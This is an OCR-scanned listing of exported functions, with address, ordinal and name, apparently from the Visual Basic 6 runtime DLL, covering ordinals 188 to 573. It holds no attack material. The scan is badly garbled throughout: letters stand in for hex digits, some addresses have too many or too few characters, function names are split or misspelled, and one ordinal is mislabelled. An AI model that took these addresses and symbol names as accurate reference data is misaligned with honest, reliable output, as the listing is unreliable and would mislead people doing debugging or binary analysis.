Addr:0FOSDF2C Ord: 188 (0OBCh) Name: __vbaRecAssign 
Addr:0F02591E Ord: 189 (0OBDh) Name: __vbaRecDestruct 
Addr:0F0D35396 Ord: 190 (0OBEh) Name: CopyRecord 
Addr:0FOD908B Ord: 191 (OOBFh) Name: __ vbaDateR4 
Addr:0FOD9OCO Ord: 192 (0OOCOh) Name: __vbaDateR8 
Addr:0F0543C3 Ord: 193 (00C1h) Name: __vbaDateStr 
Addr:0F06165A Ord: 194 (00C2h) Name: __vbaDateVar 
Addr:0F05B550 Ord: 195 (00C3h) Name: 
TipGetAddressOfPredeclaredInstance 
Addr:0FOD38FES5 Ord: 196 (00C4h) Name: __vbaDerefAry 
Addr:0FOSBCCD Ord: 197 (0OC5h) Name: __vbaDerefAryl 
Addr:0F03873E Ord: 198 (00C6h) Name: _ vbaEnd 
Addr:0F102FFC Ord: 199 (00C7h) Name: MethCallEngine 
Addr:0F01E309 Ord: 200 (00C8h) Name: __ vbaErase 
Addr:0FO0D38A2 Ord: 201 (00C9h) Name: __vbaEraseKeepData 
Addr:0F0D38D1 Ord: 202 (0OCAh) Name: __vbaEraseNoPop 
Addr:0FODOC66 Ord: 203 (0OCBh) Name: __vbaError 
Addr:0FODOC7F Ord: 204 (0OCCh) Name: __vbaErrorOverflow 
Addr:0F022B59 Ord: 205 (0OCDh) Name: __vbaExceptHandler 
Addr:0F10A15B Ord: 206 (0OCEh) Name: __vbaExitEachAry 
Addr:0F10A180 Ord: 207 (O0OCFh) Name: __ vbaExitEachColl 
Addr:0F10A13B Ord: 208 (00DOh) Name: __vbaExitEachVar 
Addr:0F02B41E Ord: 209 (00D1h) Name: __vbaExitProc 
Addr:0F10A1A4 Ord: 210 (00D2h) Name: __vbaFPException 
Addr:0F0E1093 Ord: 211 (00D3h) Name: __vbaFPFix 
Addr:0F0E111D Ord: 212 (00D4h) Name: __vbaFPInt 
Addr:OFOCFCDS Ord: 213 (00D5h) Name: __vbaFailedFriend 
Addr:0F01F890 Ord: 214 (00D6h) Name: __vbaFileClose 
Addr:0F03632E Ord: 215 (00D7h) Name: __vbaFileCloseAll 
Addr:0OFODEAB7 Ord: 216 (00D8h) Name: __vbaFileLock 
Addr:0F0028A1 Ord: 217 (00D9h) Name: __vbaFileOpen 
Addr:0FODEOD8 Ord: 218 (OODAh) Name: __vbaFileSeek 
Addr:0F03A53E Ord: 219 (0ODBh) Name: __vbaFixstrConstruct 
Addr:OFOCFCSA Ord: 220 (00DCh) Name: TipSetOption 
Addr:0F109FC1 Ord: 221 (00DDh) Name: __vbaForEachAry 
Addr:0F102BAC Ord: 222 (0ODEh) Name: __vbaForEachCollAd 
Addr:0F102B4E Ord: 223 (V0ODFh) Name: __vbaForEachCollObj 
Addr:0F102BFF Ord: 224 (00EO0h) Name: __vbaForEachCollVar 
Addr:0F10A046 Ord: 225 (00E1h) Name: __vbaForEachVar 


Addr:0F024FE8 Ord: 226 (00E2h) Name: __vbaFreeObjList 
Addr:0F0162DA Ord: 227 (00E3h) Name: TipUnloadProject 
Addr:0FO1F9AS8 Ord: 228 (00E4h) Name: __vbaFreeStrList 
Addr:0F10182B Ord: 229 (00ES5h) Name: __vbaFreeVarList 
Addr:0FODOCAB Ord: 230 (00E6h) Name: TipCreatelInstanceProject 
Addr:0F0158B9 Ord: 231 (00E7h) Name: EbResetProject 
Addr:0F02627A Ord: 232 (00E8h) Name: 
EbGetHandleOfExecutingProject 

Addr:0F0D39B3 Ord: 233 (00E9h) Name: _ vbaGenerateBoundsError 
Addr:0FODE306 Ord: 234 (OOEAh) Name: __vbaGet3 
Addr:0F0DE322 Ord: 235 (00EBh) Name: __vbaGet4 
Addr:0F03A579 Ord: 236 (00ECh) Name: __vbaGetFxStr3 
Addr:0FODE3B4 Ord: 237 (0OEDh) Name: __vbaGetExStr4 
Addr:0F040650 Ord: 238 (O0EEh) Name: __ vbaGetOwner3 
Addr:0FODE35D Ord: 239 (OOEFh) Name: __vbaGetOwner4 
Addr:0F109A05 Ord: 240 (OOFOh) Name: __vbaGosub 
Addr:0F109A59 Ord: 241 (00F1h) Name: _ vbaGosubFree 
Addr:0F109A2E Ord: 242 (00F2h) Name: __vbaGosubReturn 
Addr:0F0D2D92 Ord: 243 (00F3h) Name: __vbaHresultCheck 
Addr:0FOD2DAO Ord: 244 (00F4h) Name: __vbaHresultCheckNonvirt 
Addr:0F02B4EB Ord: 245 (00FSh) Name: __vbaHresultCheckObj 
Addr:0F10A21E Ord: 246 (00F6h) Name: __vbal2Cy 
Addr:0F0534BD Ord: 247 (00F7h) Name: __vbal2ErrVar 
Addr:0F10B47D Ord: 248 (00F8h) Name: _ vbal2ForNextCheck 
Addr:0F0508A7 Ord: 249 (00F9h) Name: __vbal2Str 
Addr:0FO1B9DA Ord: 250 (OOFAh) Name: __vbaL2Var 
Addr:0F10A230 Ord: 251 (O0FBh) Name: __vbal4Cy 
Addr:OFOSOAFO Ord: 252 (OOFCh) Name: __vbal4ErrVar 
Addr:0F10B4A09 Ord: 253 (OOFDh) Name: __vbal4ForNextCheck 
Addr:0FO0O4A6AS5 Ord: 254 (OOFEh) Name: __vbal4Str 
Addr:0F01BDB4 Ord: 255 (OOFFh) Name: __vbal4Var 
Addr:0F00BD94 Ord: 256 (0100h) Name: __vbalnStr 
Addr:0FODF190 Ord: 257 (0101h) Name: __vbalnStrB 
Addr:0FODF060 Ord: 258 (0102h) Name: __vbalnStrVar 
Addr:0FODEF30 Ord: 259 (0103h) Name: __vbalnStrVarB 
Addr:0F0DDDA41 Ord: 260 (0104h) Name: __vbalnputFile 
Addr:0F10302F Ord: 261 (0105h) Name: _ vbaLateldCall 
Addr:0F10304B Ord: 262 (0106h) Name: __vbaLateldCallLd 
Addr:0F10B15C Ord: 263 (0107h) Name: __vbaLateldCallSt 
Addr:0F10B1F2 Ord: 264 (0108h) Name: __vbaLateldNamedCall 
Addr:0F05B2A9 Ord: 265 (0109h) Name: EbResetProjectNormal 
Addr:0F03BE99 Ord: 266 (010Ah) Name: TipUnloadInstance 
Addr:0F10B1AS8 Ord: 267 (010Bh) Name: _ vbaLateldNamedCallLd 
Addr:0F009EE7 Ord: 268 (010Ch) Name: EbLibraryLoad 
Addr:0FODO9C6 Ord: 269 (010Dh) Name: EbLibraryUnload 


Addr:0F10B1D1 Ord: 270 (O10Eh) Name: __ vbaLateldNamedCallSt 
Addr:0F0112D1 Ord: 271 (010Fh) Name: EbLoadRunTime 
Addr:0F10B217 Ord: 272 (0110h) Name: __vbaLateldNamedStAd 
Addr:0F1032CD Ord: 273 (0111h) Name: __vbaLateldSt 
Addr:OFOOEEDS Ord: 274 (0112h) Name: EbCreateContext 
Addr:0F017F68 Ord: 275 (0113h) Name: EbDestroyContext 
Addr:OFOOEFIC Ord: 276 (0114h) Name: EbSetContextWorkerThread 
Addr:0F10B18E Ord: 277 (0115h) Name: __ vbaLateldStAd 
Addr:0F10300A Ord: 278 (0116h) Name: _ vbaLateMemCall 
Addr:0F1024A4 Ord: 279 (0117h) Name: _ vbaLateMemCallLd 
Addr:0F10B23A Ord: 280 (0118h) Name: __vbaLateMemCallSt 
Addr:0F10B2C8 Ord: 281 (0119h) Name: _ vbaLateMemNamedCall 
Addr:0F10B27E Ord: 282 (011Ah) Name: 

_ vbaLateMemNamedCallLd 

Addr:0F10B2A7 Ord: 283 (011Bh) Name: 

_ vbaLateMemNamedCallSt 

Addr:0F10B2ED Ord: 284 (011Ch) Name: 

_ _vbaLateMemNamedStAd 

Addr:0F10322E Ord: 285 (011Dh) Name: __vbaLateMemSt 
Addr:0F10B25B Ord: 286 (011Eh) Name: __vbaLateMemStAd 
Addr:0F01BE08 Ord: 287 (011Fh) Name: __vbaLbound 
Addr:0F00BD80 Ord: 288 (0120h) Name: __vbaLenBstr 
Addr:0FODED54 Ord: 289 (0121h) Name: __vbaLenBstrB 
Addr:0FODEBFO Ord: 290 (0122h) Name: __vbaLenVar 
Addr:OFODEC7F Ord: 291 (0123h) Name: _ vbaLenVarB 
Addr:0FODCE29 Ord: 292 (0124h) Name: __vbaLinelInputStr 
Addr:0OFODCF1A Ord: 293 (0125h) Name: __vbaLinelnputVar 
Addr:0F03A5C8 Ord: 294 (0126h) Name: __vbaLsetFixstr 
Addr:0FOEOF36 Ord: 295 (0127h) Name: __vbaLsetFixstrFree 
Addr:0FODF669 Ord: 296 (0128h) Name: _ vbaMidStmtBstr 
Addr:0FODF754 Ord: 297 (0129h) Name: _ vbaMidStmtBstrB 
Addr:0F01612B Ord: 298 (012Ah) Name: EbIsProjectOnStack 
Addr:0F01BB38 Ord: 299 (012Bh) Name: TipCreatelnstanceEx 
Addr:0F05E479 Ord: 300 (012Ch) Name: GetMem2 
Addr:0F0E89D6 Ord: 301 (012Dh) Name: GetMem4 
Addr:0F0E89E7 Ord: 302 (012Eh) Name: GetMem8 
Addr:0FOE8A19 Ord: 303 (012Fh) Name: GetMemStr 
Addr:0FOE8A54 Ord: 304 (0130h) Name: GetMemVar 
Addr:0FOES9FE Ord: 305 (0131h) Name: GetMemoObj 
Addr:0F03BF96 Ord: 306 (0132h) Name: PutMem2 
Addr:0FOESAFF Ord: 307 (0133h) Name: PutMem4 
Addr:OFOE8BOE Ord: 308 (0134h) Name: PutMem8 
Addr:0F0E8C15 Ord: 309 (0135h) Name: PutMemsStr 
Addr:0FOE8C5D Ord: 310 (0136h) Name: PutMemVar 
Addr:0F0E8B24 Ord: 311 (0137h) Name: PutMemoObj 


Addr:0OFOE8DAA Ord: 312 (0138h) Name: SetMemVar 
Addr:0F0E8D83 Ord: 313 (0139h) Name: SetMemObj 
Addr:0F0E8A73 Ord: 314 (013Ah) Name: GetMemNewObj 
Addr:0F0E8D19 Ord: 315 (013Bh) Name: PutMemNewObj 
Addr:0FOE8E3E Ord: 316 (013Ch) Name: SetMemNewObj 
Addr:0F0E89C5 Ord: 317 (013Dh) Name: GetMeml1l 
Addr:OFOESAFO Ord: 318 (013Eh) Name: PutMeml 
Addr:OFOESADS Ord: 319 (013Fh) Name: GetMemEvent 
Addr:0F0E8D73 Ord: 320 (0140h) Name: PutMemEvent 
Addr:0F03A29B Ord: 321 (0141h) Name: SetMemEvent 
Addr:0FODF697 Ord: 322 (0142h) Name: _ vbaMidStmtVar 
Addr:OFODF6BF Ord: 323 (0143h) Name: __ vbaMidStmtVarB 
Addr:OFOD5FA2 Ord: 324 (0144h) Name: _ vbaNameFile 
Addr:0FO1BE09C Ord: 325 (0145h) Name: __ vbaNew2 
Addr:0F02B448 Ord: 326 (0146h) Name: __vbaNew 
Addr:0F109E6C Ord: 327 (0147h) Name: __vbaNextEachAry 
Addr:0F103345 Ord: 328 (0148h) Name: _ vbaNextEachCollAd 
Addr:0F1032E6 Ord: 329 (0149h) Name: __vbaNextEachCollObj 
Addr:0F103252 Ord: 330 (014Ah) Name: __ vbaNextEachCollVar 
Addr:0F10AOFl1 Ord: 331 (014Bh) Name: _ vbaNextEachVar 
Addr:0F0D2C73 Ord: 332 (014Ch) Name: __vbaObjAddref 
Addr:0F00361F Ord: 333 (014Dh) Name: __vbaObjls 
Addr:0F01E2F2 Ord: 334 (014Eh) Name: __vbaObjSet 
Addr:0F022D5E Ord: 335 (014Fh) Name: __vbaObjSetAddref 
Addr:0F03361F Ord: 336 (0150h) Name: __vbaObjVar 
Addr:0F01F952 Ord: 337 (0151h) Name: _ vbaOnError 
Addr:0FODOOA6 Ord: 338 (0152h) Name: _ vbaOnGoCheck 
Addr:0F01F2E7 Ord: 339 (0153h) Name: _ vbaPowerR8 
Addr:0F003D3F Ord: 340 (0154h) Name: __vbaPrintFile 
Addr:0F04082B Ord: 341 (0155h) Name: __vbaPrintObj 
Addr:0F036232 Ord: 342 (0156h) Name: __vbaPut3 
Addr:0FODE340 Ord: 343 (0157h) Name: __vbaPut4 
Addr:0FODE39A Ord: 344 (0158h) Name: __vbaPutFxStr3 
Addr:0FODE3DO Ord: 345 (0159h) Name: __vbaPutEFxStr4 
Addr:0F0407B8 Ord: 346 (015Ah) Name: __vbaPutOwner3 
Addr:0FODE37C Ord: 347 (015Bh) Name: __vbaPutOwner4 
Addr:0FO0D9069 Ord: 348 (015Ch) Name: __vbaR4Cy 
Addr:0FODE020 Ord: 349 (015Dh) Name: __vbaR4ErrVar 
Addr:0F10B4D1 Ord: 350 (015Eh) Name: _ vbaR4ForNextCheck 
Addr:0OFODDF7E Ord: 351 (015Fh) Name: __vbaR4Sgn 
Addr:0FOD8CAO Ord: 352 (0160h) Name: __vbaR4Str 
Addr:0F0356D3 Ord: 353 (0161h) Name: __vbaR4Var 
Addr:0F0O2FB8B Ord: 354 (0162h) Name: __vbaR8Cy 
Addr:0FODEO0O2A Ord: 355 (0163h) Name: __vbaR8ErrVar 
Addr:0FOE10A5 Ord: 356 (0164h) Name: __vbaR8FixI2 


Addr:0F039F4E Ord: 357 (0165h) Name: __vbaR8FixI4 
Addr:OF10B50A Ord: 358 (0166h) Name: __vbaR8ForNextCheck 
Addr:0FO0E112F Ord: 359 (0167h) Name: __vbaR8Int2 
Addr:0F0E1152 Ord: 360 (0168h) Name: __vbaR8IntI4 
Addr:OFODDFA9 Ord: 361 (0169h) Name: __vbaR8Sgn 
Addr:0FOD8CD4 Ord: 362 (016Ah) Name: __vbaR8Str 
Addr:OFO1EFES5 Ord: 363 (016Bh) Name: __vbaR8Var 
Addr:0F10B175 Ord: 364 (016Ch) Name: __vbaRaiseEvent 
Addr:0FOD35E4 Ord: 365 (016Dh) Name: _ vbaRecAnsiToUni 
Addr:0FOD361E Ord: 366 (016Eh) Name: _ vbaRecDestructAnsi 
Addr:OFOD35AA Ord: 367 (016Fh) Name: _ vbaRecUniTOoAnsi 
Addr:0F01C113 Ord: 368 (0170h) Name: __ vbaRedim 
Addr:0F042A56 Ord: 369 (0171h) Name: _ vbaRedimPreserve 
Addr:0F0D3995 Ord: 370 (0172h) Name: _ vbaRedimPreserveVar 
Addr:0F0D3977 Ord: 371 (0173h) Name: __ vbaRedimVar 
Addr:0FO0O1EF4A Ord: 372 (0174h) Name: __vbaRefVarAry 
Addr:OFODBCES Ord: 373 (0175h) Name: __vbaResume 
Addr:0FODF398 Ord: 374 (0176h) Name: __vbaRsetPFixstr 
Addr:OFOEOFSA Ord: 375 (0177h) Name: __vbaRsetFixstrFree 
Addr:0FOS8DAB Ord: 376 (0178h) Name: __vbaSetSystemError 
Addr:0FOCFC96 Ord: 377 (0179h) Name: __vbaStopExe 
Addr:0F102D92 Ord: 378 (017Ah) Name: __vbaStr2Vec 
Addr:OFOCFEFD Ord: 379 (017Bh) Name: __vbaStrAryToAnsi 
Addr:0FOCFF13 Ord: 380 (017Ch) Name: __vbaStrAryToUnicode 
Addr:0F0D843C Ord: 381 (017Dh) Name: __vbaStrBool 
Addr:0F00208F Ord: 382 (017Eh) Name: __vbaStrCat 
Addr:0FO01F8F6 Ord: 383 (017Fh) Name: __vbaStrCmp 
Addr:0F003563 Ord: 384 (0180h) Name: __vbaStrComp 
Addr:0FODF5D4 Ord: 385 (0181h) Name: __vbaStrCompVar 
Addr:0FOD84FC Ord: 386 (0182h) Name: __vbaStrCy 
Addr:0F0D84B8 Ord: 387 (0183h) Name: __vbaStrDate 
Addr:0FOEOF14 Ord: 388 (0184h) Name: __vbaStrFixstr 
Addr:0F0129F8 Ord: 389 (0185h) Name: __vbastrI2 
Addr:0FO1BECF Ord: 390 (0186h) Name: __vbaStrI4 
Addr:OFOEOEB4 Ord: 391 (0187h) Name: __vbaStrLike 
Addr:0F0438CE Ord: 392 (0188h) Name: __vbaStrR4 
Addr:0F04024E Ord: 393 (0189h) Name: __vbaStrR8 
Addr:OFOEOE9F Ord: 394 (018Ah) Name: __vbaStrTextCmp 
Addr:OFOEOEC9 Ord: 395 (018Bh) Name: __vbaStrTextLike 
Addr:0FOCFD43 Ord: 396 (018Ch) Name: __vbaStrToAnsi 
Addr:0F0CFD14 Ord: 397 (018Dh) Name: __vbaStrToUnicode 
Addr:0FOD8481 Ord: 398 (018Eh) Name: __vbaStrUll 
Addr:0F0D8533 Ord: 399 (018Fh) Name: __ vbaStrVarCopy 
Addr:0F03634A Ord: 400 (0190h) Name: 
EVENT_SINK_QuerylInterface 


Addr:0F02299D Ord: 401 (0191h) Name: EVENT_SINK_AddRef 
Addr:0F037FD1 Ord: 402 (0192h) Name: EVENT_SINK_Release 
Addr:OFOCFB3F Ord: 403 (0193h) Name: 
EVENT_SINK_GetIDsOfNames 

Addr:0F03BB08 Ord: 404 (0194h) Name: EVENT_SINK_Invoke 
Addr:0F0262A1 Ord: 405 (0195h) Name: __vbaStrVarMove 
Addr:0F05A825 Ord: 406 (0196h) Name: __vbaStrVarVal 
Addr:0F10A20C Ord: 407 (0197h) Name: __vbaUIICy 
Addr:OFODDFE8 Ord: 408 (0198h) Name: __vbaUIlErrVar 
Addr:0FO0D901D Ord: 409 (0199h) Name: __vbaUllStr 
Addr:0F014C08 Ord: 410 (019Ah) Name: 
BASIC_CLASS_QuerylInterface 
Addr:0F0025FE Ord: 411 (019Bh) Name: BASIC_CLASS_AddRef 
Addr:0FO1DCE6F Ord: 412 (019Ch) Name: BASIC_CLASS_Release 
Addr:0F054DAS Ord: 413 (019Dh) Name: 
BASIC_CLASS_GetlDsOfNames 

Addr:0F054792 Ord: 414 (019Eh) Name: BASIC_CLASS_Invoke 
Addr:0FODE002 Ord: 415 (019Fh) Name: __vbaUll Var 
Addr:0F01BD72 Ord: 416 (O1AOh) Name: _ vbaUbound 
Addr:0F0OD2D6D Ord: 417 (01A1h) Name: __vbaUnkVar 
Addr:0F102A2D Ord: 418 (01A2h) Name: __vbaVar2Vec 
Addr:0F10A2E0 Ord: 419 (01A3h) Name: __vbaVarAbs 
Addr:0FOCF8C1 Ord: 420 (01A4h) Name: 
BASIC_DISPINTERFACE_ GetTICount 

Addr:0FOCF8DO Ord: 421 (01A5h) Name: 
BASIC_DISPINTERFACE_GetTypelnfo 

Addr:0F100ECC Ord: 422 (01A6h) Name: __vbaVarAdd 
Addr:0F100AB2 Ord: 423 (01A7h) Name: __vbaVarAnd 
Addr:0F004B24 Ord: 424 (01A8h) Name: _ vbaVarCat 
Addr:0F10BA7F Ord: 425 (01A9h) Name: __ vbaVarCmpEq 
Addr:0F10BABS Ord: 426 (01AAh) Name: __vbaVarCmpGe 
Addr:0F10BAEB Ord: 427 (01ABh) Name: _ vbaVarCmpGt 
Addr:0F10BB21 Ord: 428 (01ACh) Name: _ vbaVarCmpLe 
Addr:0F10BB57 Ord: 429 (01ADh) Name: __vbaVarCmpLt 
Addr:0F0437B7 Ord: 430 (01 AEh) Name: Zombie_QueryInterface 
Addr:0F03C29A Ord: 431 (01AFh) Name: Zombie_AddRef 
Addr:0F043368 Ord: 432 (01B0h) Name: Zombie_Release 
Addr:0FOCFBB7 Ord: 433 (01B 1h) Name: 
Zombie_GetTypelnfoCount 

Addr:OFOCFBAF Ord: 434 (01B2h) Name: Zombie_GetTypelnfo 
Addr:OFOCFBBF Ord: 435 (01B3h) Name: Zombie_GetIDsOfNames 
Addr:0FOCFBC7 Ord: 436 (01B4h) Name: Zombie_Invoke 
Addr:0F1020B8 Ord: 437 (01B5h) Name: __vbaVarCmpNe 
Addr:0F06168C Ord: 438 (01B6h) Name: __ vbaVarDateVar 
Addr:0F10137B Ord: 439 (01B7h) Name: __vbaVarDiv 


Addr:OFOCFAFF Ord: 440 (01B8h) Name: EVENT_SINK2_AddRef 
Addr:OFOCFB1F Ord: 441 (01B9h) Name: EVENT_SINK2_Release 
Addr:0F10B69A Ord: 442 (01BAh) Name: __vbaVarEqv 
Addr:0FOD8FE2 Ord: 443 (01BBh) Name: __vbaVarErrl4 
Addr:0F10A43C Ord: 444 (01BCh) Name: __vbaVarFix 
Addr:0F103395 Ord: 445 (01BDh) Name: __vbaVarForlnit 
Addr:0F1034CF Ord: 446 (01BEh) Name: __vbaVarForNext 
Addr:0F1020EB Ord: 447 (01BFh) Name: __vbaVarldiv 
Addr:0F10B737 Ord: 448 (01C0h) Name: __vbaVarlmp 
Addr:0FO1EFD9 Ord: 449 (01C1h) Name: _ vbaVarIndexLoad 
Addr:0F058D54 Ord: 450 (01C2h) Name: __ vbaVarIndexLoadRef 
Addr:0FOD39BA Ord: 451 (01C3h) Name: 

_ vbaVarlndexLoadRefLock 

Addr:0FOD39F4 Ord: 452 (01C4h) Name: _ vbaVarIndexStore 
Addr:0FOD39FE Ord: 453 (01C5h) Name: __vbaVarIndexStoreObj 
Addr:0F10A538 Ord: 454 (01C6h) Name: __vbaVarlnt 
Addr:0FOEOE45 Ord: 455 (01C7h) Name: __vbaVarLike 
Addr:OFOEOEDE Ord: 456 (01C8h) Name: _ vbaVarLikeVar 
Addr:0F103154 Ord: 457 (01C9h) Name: __vbaVarMod 
Addr:0F101986 Ord: 458 (O01CAh) Name: __vbaVarMul 
Addr:0F102AA9 Ord: 459 (01CBh) Name: _ vbaVarNeg 
Addr:0F102EFC Ord: 460 (01CCh) Name: __ vbaVarNot 
Addr:0F10B543 Ord: 461 (01CDh) Name: __vbaVarOr 
Addr:0F101FBC Ord: 462 (01CEh) Name: __vbaVarPow 
Addr:0F0D2C88 Ord: 463 (01CFh) Name: __vbaVarSetObj 
Addr:0FOSC3AA Ord: 464 (01D0h) Name: __vbaVarSetObjAddref 
Addr:0FOD2CB4 Ord: 465 (01D1h) Name: __vbaVarSetUnk 
Addr:0FOD2CEO0 Ord: 466 (01D2h) Name: _ vbaVarSetUnkAddref 
Addr:0F0496B1 Ord: 467 (01D3h) Name: __vbaVarSetVar 
Addr:0FO0D2D09 Ord: 468 (01D4h) Name: _ vbaVarSetVarAddref 
Addr:0F1024CD Ord: 469 (01D5h) Name: _ vbaVarSub 
Addr:0F10BB8D Ord: 470 (01D6h) Name: __vbaVarTextCmpEqg 
Addr:0F10BBF9 Ord: 471 (01D7h) Name: __vbaVarTextCmpGe 
Addr:0F10BC2F Ord: 472 (01D8h) Name: _ vbaVarTextCmpGt 
Addr:0F10BC65 Ord: 473 (01D9h) Name: __vbaVarTextCmpLe 
Addr:0F10BC9B Ord: 474 (01DAh) Name: __vbaVarTextCmpLt 
Addr:0F10BBC3 Ord: 475 (01DBh) Name: __ vbaVarTextCmpNe 
Addr:0FOE0E72 Ord: 476 (01DCh) Name: __vbaVarTextLike 
Addr:0FOEOEP9 Ord: 477 (01DDh) Name: __vbaVarTextLikeVar 
Addr:0F10B9E9 Ord: 478 (01DEh) Name: __vbaVarTextTstEq 
Addr:OFIOBA1B Ord: 479 (01DFh) Name: __ vbaVarTextTstGe 
Addr:0F10BA34 Ord: 480 (01EO0h) Name: _ vbaVarTextTstGt 
Addr:0F10BA4D Ord: 481 (01E1h) Name: __vbaVarTextTstLe 
Addr:0F10BA66 Ord: 482 (01E2h) Name: _ vbaVarTextTstLt 
Addr:0F10BA02 Ord: 483 (01E3h) Name: _ vbaVarTextTstNe 


Addr:0F10B99E Ord: 484 (01E4h) Name: __vbaVarTstEg 
Addr:0F10B9B7 Ord: 485 (01E5h) Name: _ vbaVarTstGe 
Addr:0F101F8A Ord: 486 (01E6h) Name: __vbaVarTstGt 
Addr:0F10B9DO0 Ord: 487 (01E7h) Name: __ vbaVarTstLe 
Addr:0F1032B4 Ord: 488 (01ESh) Name: _ vbaVarTstLt 
Addr:0F10209F Ord: 489 (01E9h) Name: __vbaVarTstNe 
Addr:0F10B5SFF Ord: 490 (01EAh) Name: __vbaVarXor 
Addr:0F109CC3 Ord: 491 (01EBh) Name: __vbaVargObj 
Addr:0F109D2B Ord: 492 (01ECh) Name: _ vbaVargObjAddref 
Addr:0F109D93 Ord: 493 (01EDh) Name: __vbaVargUnk 
Addr:0F109DFS5 Ord: 494 (01EEh) Name: _ vbaVargUnkAddref 
Addr:0F0D2D45 Ord: 495 (01EFh) Name: __ vbaVerifyVarObj 
Addr:0FOD65BC Ord: 496 (01FOh) Name: __vbaWriteFile 
Addr:0FOE78A1 Ord: 497 (01F1h) Name: _adj_fdiv_ml161 
Addr:0F0E7809 Ord: 498 (01F2h) Name: _adj_fdiv_m32 
Addr:0FOE78D5 Ord: 499 (01F3h) Name: _adj_fdiv_m321 
Addr:0F0E7855 Ord: 500 (01F4h) Name: _adj_fdiv_m64 
Addr:0F0E7344 Ord: 501 (01F5h) Name: _adj_fdiv_r 
Addr:0FOE79A1 Ord: 502 (01F6h) Name: _adj_fdivr_m161 
Addr:0F0E7909 Ord: 503 (01F7h) Name: _adj_fdivr_m32 
Addr:0F0E79D5 Ord: 504 (01F8h) Name: _adj_fdivr_m321 
Addr:0F0E7955 Ord: 505 (01F9h) Name: _adj_fdivr_m64 
Addr:0FO0OE7F91 Ord: 506 (01FAh) Name: _adj_fpatan 
Addr:0F0E7C24 Ord: 507 (01FBh) Name: _adj_fprem 
Addr:OFOE7EDC Ord: 508 (01FCh) Name: _adj_fpreml 
Addr:0F0OE7F94 Ord: 509 (01FDh) Name: _adj_fptan 
Addr:0FOEA763 Ord: 510 (01FEh) Name: _allmul 
Addr:0F00B87E Ord: 512 (0200h) Name: rtcLeftBstr 
Addr:0FOOB8SFD Ord: 513 (0201h) Name: rtcLeftVar 
Addr:0F012425 Ord: 514 (0202h) Name: rtcRightBstr 
Addr:0F0123C4 Ord: 515 (0203h) Name: rtcRightVar 
Addr:0F03C89B Ord: 516 (0204h) Name: rtcAnsiValueBstr 
Addr:0F03A4D7 Ord: 517 (0205h) Name: rtcLowerCaseBstr 
Addr:0F03A479 Ord: 518 (0206h) Name: rtecLowerCaseVar 
Addr:0F0122F0 Ord: 519 (0207h) Name: rtcTrimBstr 
Addr:0FODF23C Ord: 520 (0208h) Name: rtcTrimVar 
Addr:0FODF2B5 Ord: 521 (0209h) Name: rtcLeftTrimBstr 
Addr:0FODF2DA Ord: 522 (020Ah) Name: rtcLeftTrimVar 
Addr:0OFODF4BC Ord: 523 (020Bh) Name: rtcRightTrimBstr 
Addr:0FODF4E1 Ord: 524 (020Ch) Name: rtcRightTrimVar 
Addr:0FODF81E Ord: 525 (020Dh) Name: rtcSpaceBstr 
Addr:0FODF860 Ord: 526 (020Eh) Name: rteSpaceVar 
Addr:0FODF88E Ord: 527 (020Fh) Name: rtcUpperCaseBstr 
Addr:0FODF8B3 Ord: 528 (0210h) Name: rtcUpperCaseVar 
Addr:0F01272A Ord: 529 (0211h) Name: rtcKillFiles 


Addr:0FOD5C7F Ord: 530 (0212h) Name: rtcChangeDir 
Addr:0FOD5CA2 Ord: 531 (0213h) Name: rtcMakeDir 
Addr:0FOD5CB3 Ord: 532 (0214h) Name: rtcRemoveDir 
Addr:0F0D6033 Ord: 533 (0215h) Name: rtcChangeDrive 
Addr:0FOD3A18 Ord: 534 (0216h) Name: rtcBeep 
Addr:0F022D75 Ord: 535 (0217h) Name: rtcGetTimer 
Addr:0F050519 Ord: 536 (0218h) Name: rteStrFromVar 
Addr:0F01BCE6 Ord: 537 (0219h) Name: rtcBstrFromAnsi 
Addr:0F0D6626 Ord: 538 (021Ah) Name: rtcPackDate 
Addr:0FOD668A Ord: 539 (021Bh) Name: rtcPackTime 
Addr:0FOD66F4 Ord: 540 (021Ch) Name: rtcGetDateV alue 
Addr:0F0D676C Ord: 541 (021Dh) Name: rtcGetTimeV alue 
Addr:0FO0D686F Ord: 542 (021Eh) Name: rtcGetDayOfMonth 
Addr:0F0D6931 Ord: 543 (021Fh) Name: rteGetHourOfDay 
Addr:0F0D6978 Ord: 544 (0220h) Name: rteGetMinuteOfHour 
Addr:0F0D6828 Ord: 543 (0221h) Name: rteGetMonthOf Year 
Addr:0FO1B4AC Ord: 546 (0222h) Name: rtcGetPresentDate 
Addr:0FOD69BF Ord: 547 (0223h) Name: rteGetSecondOfMinute 
Addr:OFOD6A8A Ord: 548 (0224h) Name: rtcSetDate Var 
Addr:0FOD6AD7 Ord: 549 (0225h) Name: rtcSetDateBstr 
Addr:0FOD6CDS3 Ord: 550 (0226h) Name: rtcSetTimeVar 
Addr:0F0D6D30 Ord: 551 (0227h) Name: rtcSetTimeBstr 
Addr:0FO0D68B6 Ord: 552 (0228h) Name: rteGetDayOf Week 
Addr:0FOD67E1 Ord: 553 (0229h) Name: rtcGetYear 
Addr:0F0D7D20 Ord: 554 (022Ah) Name: rtcFileReset 
Addr:0FOD7DBD Ord: 555 (022Bh) Name: rtcFileAttributes 
Addr:0FOSE65B Ord: 556 (022Ch) Name: rtcIsArray 
Addr:0F0D3A44 Ord: 557 (022Dh) Name: rtcIsDate 
Addr:0F0D3B2C Ord: 558 (022Eh) Name: rtcIsEmpty 
Addr:0F0D3B43 Ord: 559 (022Fh) Name: rtcIsError 
Addr:0FOD3BS5E Ord: 560 (0230h) Name: rtcIsNull 
Addr:0F0D3B77 Ord: 561 (0231h) Name: rtcIsNumeric 
Addr:0FOD3CA9 Ord: 562 (0232h) Name: rtcIsObject 
Addr:0F0506E7 Ord: 563 (0233h) Name: rtcVarType 
Addr:0F0D8118 Ord: 564 (0234h) Name: rtDecFromVar 
Addr:0F0D7D4A Ord: 565 (0235h) Name: rtcFile Width 
Addr:0OFODCF9D Ord: 566 (0236h) Name: rteInputCount 
Addr:0OFODCF6EC Ord: 567 (0237h) Name: rtcInputCountVar 
Addr:0FODEO534 Ord: 568 (0238h) Name: rtcFileSeek 
Addr:0FODE19D Ord: 569 (0239h) Name: rtcFileLocation 
Addr:0F0DE230 Ord: 570 (023Ah) Name: rtcFileLength 
Addr:0F0D7E39 Ord: 571 (023Bh) Name: rtcEndOfFile 
Addr:0F05D268 Ord: 572 (023Ch) Name: rtcHexBstrFromVar 
Addr:0F05D22E Ord: 573 (023Dh) Name: rtcHexVarFromVar 
